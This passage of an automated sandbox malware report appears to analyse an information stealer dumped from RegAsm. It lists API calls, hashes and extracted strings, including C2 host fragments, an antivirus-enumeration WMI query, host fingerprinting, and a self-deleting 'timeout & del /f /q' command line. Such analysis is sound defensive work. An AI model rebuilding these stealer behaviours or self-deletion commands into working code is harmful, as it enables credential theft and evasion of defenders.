                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                          • Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                          • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
                                                                                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4
                                                                                                                                                          • Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                                                          • Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                                                          • Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
                                                                                                                                                          • Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2
                                                                                                                                                          • Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                                                          • Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                                                          • Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
                                                                                                                                                          • Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A
                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00417A9A
                                                                                                                                                          • Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                                                          • Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                                                          • Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100
                                                                                                                                                          • Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                                                          • Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                                                          • Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                                                          • Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                                                          • Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                                                          • Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00418000
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                                                        • String ID: .exe$.exe$_DEBUG.zip$bb7310eab4245006f125c442da2d1e50$cowod.$hopto$http://$org
                                                                                                                                                        • API String ID: 305159127-4208217514
                                                                                                                                                        • Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                                                        • Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
                                                                                                                                                        • Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                                                        • Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B
                                                                                                                                                        Function 004135A8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • strtok_s.MSVCRT ref: 004135EA
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,true), ref: 004136AC
                                                                                                                                                          • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                          • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 0041376E
                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 00413817
                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 00413853
                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
                                                                                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
                                                                                                                                                        • strtok_s.MSVCRT ref: 0041398F
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                        • String ID: false$true
                                                                                                                                                        • API String ID: 2116072422-2658103896
                                                                                                                                                        • Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                                                        • Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
                                                                                                                                                        • Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                                                        • Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48
                                                                                                                                                        Function 00405237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161networkmemoryfileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                                                                        • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                                                                                        • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                                                                        • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
                                                                                                                                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00405439
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00405445
                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00405451
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                        • String ID: GET$\xA
                                                                                                                                                        • API String ID: 442264750-571280152
                                                                                                                                                        • Opcode ID: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                                                        • Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
                                                                                                                                                        • Opcode Fuzzy Hash: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                                                        • Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55
                                                                                                                                                        Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                                                        • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                                                          • Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
                                                                                                                                                          • Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00411A8B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                        • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                        • API String ID: 4288110179-315474579
                                                                                                                                                        • Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                                                        • Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
                                                                                                                                                        • Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                                                        • Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68
                                                                                                                                                        Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 004012A7
                                                                                                                                                        • _memset.LIBCMT ref: 004012B6
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
                                                                                                                                                        • lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378
                                                                                                                                                          • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                          • Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                          • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 004013E3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2891980384-0
                                                                                                                                                        • Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                                                        • Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
                                                                                                                                                        • Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                                                        • Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98
                                                                                                                                                        Function 00418271 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00418296
                                                                                                                                                        • _memset.LIBCMT ref: 004182A5
                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004182BA
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • ShellExecuteEx.SHELL32(?), ref: 00418456
                                                                                                                                                        • _memset.LIBCMT ref: 00418465
                                                                                                                                                        • _memset.LIBCMT ref: 00418477
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00418487
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                        Strings
                                                                                                                                                        • " & exit, xrefs: 00418389
                                                                                                                                                        • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00418390
                                                                                                                                                        • " & exit, xrefs: 004183DA
                                                                                                                                                        • /c timeout /t 10 & del /f /q ", xrefs: 004182E5
                                                                                                                                                        • " & rd /s /q "C:\ProgramData\, xrefs: 00418333
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                        • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                        • API String ID: 2823247455-1079830800
                                                                                                                                                        • Opcode ID: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
                                                                                                                                                        • Instruction ID: c0b88dd988d93b421ffa70f66641025a2a3514e4fd921881642ee0a142b314ca
                                                                                                                                                        • Opcode Fuzzy Hash: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
                                                                                                                                                        • Instruction Fuzzy Hash: A951ACB1D4022A9BCB61EF15CD85ADDB3BCAB44708F4110EAA718B3151DA746FC68E58
                                                                                                                                                        Function 004109A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                                                                        • wsprintfA.USER32 ref: 00410AA7
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6
                                                                                                                                                          • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                                                          • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                                                                          • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                                                          • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00410ACD
                                                                                                                                                          • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                                                          • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
